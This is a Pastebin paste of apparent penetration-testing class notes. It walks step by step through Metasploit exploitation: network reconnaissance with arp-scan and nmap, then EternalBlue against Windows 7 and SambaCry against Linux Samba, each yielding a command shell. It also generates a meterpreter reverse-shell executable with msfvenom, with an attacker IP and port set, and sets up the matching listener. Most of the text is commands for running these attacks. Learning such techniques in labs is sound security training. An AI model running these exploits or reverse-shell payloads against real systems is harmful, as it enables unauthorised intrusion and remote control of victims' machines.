viprajput

g2s8..

Jul 29th, 2018
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
  1. Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
  2.  
  3.  
  4. DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
  5.  
  6.  
  7. https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html
  8. Grade 2 Session 8
  9. =================
  10. Console Based Exploitation 3
  11. Windows 7 --> Eternal Blue
  12. Samba Cry --> Eternal Red
  13. Application Based Exploitation
  14. Payload Based Exploitation
  15. Post Exploitation --> Local Privilidge Escalation
  16. GUI Based Exploitation --> Armitage
  17.  
  18. Console Based Exploitation 3
  19. ----------------------------
  20. Eternal Blue --> NSA Exploit leaked by Shadow Brokers
  21. EternalBlue-Double Pulsar
  22. dll --> Dynamic Linked Library File
  23. Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
  24. Shadow Brokers ---> Fuzzbunch.py
  25. Empire --> MSF of NSA
  26. Metasploit Module
  27.  
  28. Steps
  29. =====
  30. Open a terminal
  31. 1. #arp-scan --local
  32. Target IP Address --> 192.168.228.138
  33. 2. #nmap 192.168.228.138
  34. 3. #nmap -sS -sC -sV 192.168.228.138
  35. 4. #nmap 192.168.228.138 --script vuln
  36. CVE-2017-0143
  37. Open another terminal, start metasploit framework
  38. 5. #msfconsole
  39. 6. #search CVE-2017-0143
  40. 7. #use auxiliary/scanner/smb/smb_ms17_010
  41. 8. #options
  42. 9. #set rhosts 192.168.228.138
  43. 10. #options
  44. 11. #run
  45. Host is vulnerable to the exploit
  46. 12. #use exploit/windows/smb/ms17_010_eternalblue
  47. 13. #show options
  48. 14. #set rhost 192.168.228.138
  49. 15. #options
  50. 16. #exploit
  51. C:/Windows/System32> --> I got the access of the command prompt
  52. For Changing the payload
  53. set payload windows/meterpreter/reverse_tcp
  54.  
  55. Samba Cry - Eternal Red
  56. =======================
  57. Is the vulnerability for Linux Based OS. SMBv2.
  58. NSA Exploit leaked by Shadow Brokers.
  59. Open a terminal
  60. 1. #arp-scan --local
  61. Target IP Address --> 192.168.228.151
  62. 2. #nmap 192.168.228.151
  63. 3. #nmap -sS -sC -sV 192.168.228.151
  64. 4. #nmap 192.168.228.151 --script vuln
  65. Open another terminal, start metasploit framework
  66. 5. #search is_known_pipename
  67. 6. #search cve-2017-7494
  68. exploit/linux/samba/is_known_pipename
  69. 7. #use exploit/linux/samba/is_known_pipename
  70. 8. #info
  71. 9. #options
  72. 10. #set rhost 192.168.228.151
  73. 11. #run
  74. Will Give me raw shell --> Bash Shell
  75.  
  76. Application Based Exploitation
  77. ==============================
  78. Open the terminal, start with msfconsole
  79. 1. #msfconsole
  80. 2. #search payload/windows/meterpreter
  81. payload/windows/meterpreter/reverse_tcp --> use
  82. payload/windows/meterpreter_reverse_tcp
  83. payload/windows/meterpreter/reverse_http
  84. payload/windows/meterpreter_reverse_tcp
  85.  
  86. Open Another Terminal, for creating a payload - stub
  87. 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
  88.  
  89. -p --> selecting the payload
  90. windows/meterpreter/reverse_tcp --> is the payload
  91. lhost --> attacker's IP Address
  92. lport --> Listening attacker's port
  93. -f --> file format
  94. exe --> executable file
  95. > --> destination of the output
  96. /root/Desktop/prasheel.exe --> is the output file
  97.  
  98. Go back to the first terminal, exploit, set the listening server
  99. 4. #use exploit/multi/handler
  100. 5. #show options
  101. 6. #set payload windows/meterpreter/reverse_tcp
  102. 7. #show options
  103. 8. #set lport 8989
  104. 9. #set lhost 192.168.0.25
  105. 10. #exploit
  106.  
  107. Armitage --> GUI Based Exploitation
  108. Graphical Version of Metasploit Framework
Add Comment
Please, Sign In to add comment